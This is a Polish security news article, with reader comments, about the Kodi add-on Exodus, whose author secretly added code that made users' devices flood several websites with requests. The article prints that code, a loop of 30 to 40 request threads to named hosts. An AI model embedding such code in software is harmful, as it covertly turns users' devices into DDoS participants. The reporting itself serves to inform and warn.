05.02.2017 | 09:46

Adam Haertle

Używasz Kodi i wtyczki Exodus? Mogłeś nieświadomie brać udział w atakach DDoS

Użytkownicy jednego z najpopularniejszych odtwarzaczy multimedialnych mogli nieświadomie brać udział w atakach DDoS, ponieważ autor bardzo popularnej wtyczki bał się ujawnienia jego tożsamości.

Kodi to coraz bardziej popularny odtwarzacz multimediów działający na wielu platformach. Jego główną przewagą nad konkurencją jest dostępność mnóstwa wtyczek zapewniających dodatkowe funkcje. Jedną z najpopularniejszych wtyczek jest – a przynajmniej do tej pory był – Exodus, czyli wtyczka umożliwiająca proste, wygodne i darmowe oglądanie najnowszych filmów i seriali w przyzwoitej jakości.

Tajemniczy kod

Jak donosi niezawodny TorrentFreak, około tygodnia temu w kodzie wtyczki pojawił się dziwny fragment. Kod wyglądał następująco:

threads = []
def thegoodfight(url): client.request(url, limit='256')
def thegoodfight2(): return client.parseDOM(client.request('https://raw.githubusercontent.com/sClarkeIsBack/StreamHub/master/Repo_Files/addons.xml'), 'addon', ret='version', attrs = {'id': 'plugin.video.streamhub'})[0]
r = cache.get(thegoodfight2, 1)
for i in range(1, 30): threads.append(workers.Thread(thegoodfight, 'https://raw.githubusercontent.com/sClarkeIsBack/StreamHub/master/Repo_Files/Zips/plugin.video.streamhub/plugin.video.streamhub-%s.zip' % r))
for i in range(1, 40): threads.append(workers.Thread(thegoodfight, 'http://mkodi.co.uk/shop/'))
[i.start() for i in threads]

try: progressDialog.close()
except: pass

self.sourcesFilter()

return self.sources

Jego obecność powodowała, że za każdym razem, gdy użytkownik wtyczki odtwarzał wybrany materiał, jego urządzenie wykonywało między 30 a 40 połączeń do kilku adresów WWW. Wyglądało to co najmniej podejrzanie. Na forach natychmiast rozpoczęła się dyskusja, do której szybko dołączył twórca wtyczki, ukrywający się pod pseudonimem Lambda.

Lambda wyjaśnił, że bliżej niezidentyfikowane osoby zagroziły mu ujawnieniem jego tożsamości (którą mogą być zainteresowane organy ścigania na zlecenie dużych firm produkujących materiały wideo) a wspomniany kod został zamieszczony we wtyczce jako narzędzie do walki z napastnikami. Gdy społeczność Kodi wyraziła co najmniej zdumienie odnośnie tego, że ich komputery są wykorzystywane do ataków DDoS, Lambda wypuścił kolejną wersję wtyczki, w której ataki można było włączyć lub wyłączyć. Nie przekonało to jednak użytkowników a sam Lambda, mając już dosyć całej sytuacji, przyznał, że postąpił niezbyt rozsądnie i oświadczył, że rozwój wtyczki porzuca i znika. Wtyczkę przejęły inne osoby i obecnie dostępna wersja nie zawiera już kodu generującego ataki.

Kodi i Exodus

Kwestia zaufania

Uruchamianie cudzego oprogramowania na własnym komputerze zawsze jest obarczone pewnym ryzykiem. Skutkiem może być nie tylko prowadzenie ataków DDoS, ale także na przykład użycie karty graficznej do kopania bitcoinów lub łącza internetowego do świadczenia nieznajomym usługi VPN. Wszystko jest kwestią zaufania. Jeśli korzystacie z programów o dobrej renomie, produkowanych przez rzetelne osoby lub firmy, to ryzyko wydaje się niewielkie, a korzyści znacznie je przewyższają. Jak zresztą widać na powyższych przykładach, zawsze możecie liczyć na to, że ktoś ewentualny problem zauważy, zgłosi i wyeliminuje zagrożenie. Warto jednak pamiętać, że ryzyko rośnie wraz ze spadkiem wiarygodności dostawcy – zatem pomyślcie 3 razy zanim zainstalujecie „generator loginów Netfliksa” albo „nowy cheat do CSa”.

Powrót

Komentarze

  • 2017.02.05 14:02 kaper

    … albo, na telefonie, apkę do latarki, która wymaga dostępu do tożsamości, lokalizacji, zdjęć/multimediów/plików, informacji o połączeniu WiFi, identyfikatora urządzenia i informacji o połączeniu. A poza tym do aparatu foto…

    Odpowiedz
    • 2017.02.05 21:36 x

      akurat foto jest jej niezbędne, żeby mogła włączyć flesz

      Odpowiedz
      • 2017.02.10 23:42 zakius

        co jest idiotyczne, powinni te uprawnienia rozdzielić
        ogólnie uprawnienia są opisywane zbyt ogólnie i nie wiadomo o co chodzi bardzo często, a powinna być możliwość udostępnienia załóżmy tylko tylnego aparatu bez kontroli lampy i bez dźwięku jak komuś się podoba

        Odpowiedz
  • 2017.02.06 00:56 Ryba od Kilera

    Dlatego piraciki lepiej z przeglądarki, po stronach www oglądać ;D

    Odpowiedz
  • 2017.02.06 08:51 Patrick

    Albo napiprojekt i nie zaznaczysz podczas zaawansowanej instalacji, że jakimś dziwnym zbiegiem okoliczności, akurat Ty nie chcesz malware instalować razem z programem.

    Odpowiedz
  • 2017.02.09 14:06 ToJa

    No ja kodiego mam odpalonego w dockerze, więc co prawda ddosa mógł pierdyknąć, ale przynajmniej nie ryzykuję, że uzyska dostęp do reszty systemu. Tak się niestety składa, że z exodusa też korzystam, więc mogłem ddosować co nieco przy okazji, czas chyba jakieś filtry porobić na iptables.

    Odpowiedz
  • 2017.02.10 23:21 peżot

    jedyna godna wtyczka do kodi to sd-xmbc i oczywiście weebtv z oplaconym da wycisnąć co najlepsze z telewizyjnych warchlaków (hbo-hd/hbo2-hd najważnejsze) a jak komuś mało to zawsze może zanurzyć hajsy w korpo zwanym netflix ale jak dla mnie co za dużo to nie zdrowo nie te ceny panowie jak dla polaka-robaka walącego korporacje po dopie..

    Odpowiedz
  • 2018.03.01 17:50 Trew

    Miałem kiedyś na notebooku bez klapy postawione OPENELEC, z pilocikiem X-10 radiowym, wszystko działało bardzo fajnie, póki nie odkryłem że wysyła jakieś dane (na asemtrycznym łączu 1/17 to widoczne jak cholera) Dziadostwo wysyłało strumień wszystkiego co oglądam, na szczęście 1kl/s ale i tak sieć w miejscu stawała. Dane leciały na serwer Amazona wynajęty przez firmę Kroll z Niemiec. Ciekawe po co te szwabskie dziady to robiły.

    Odpowiedz

Zostaw odpowiedź do zakius

Jeśli chcesz zwrócić uwagę na literówkę lub inny błąd techniczny, zapraszamy do formularza kontaktowego. Reagujemy równie szybko.

Używasz Kodi i wtyczki Exodus? Mogłeś nieświadomie brać udział w atakach DDoS

Komentarze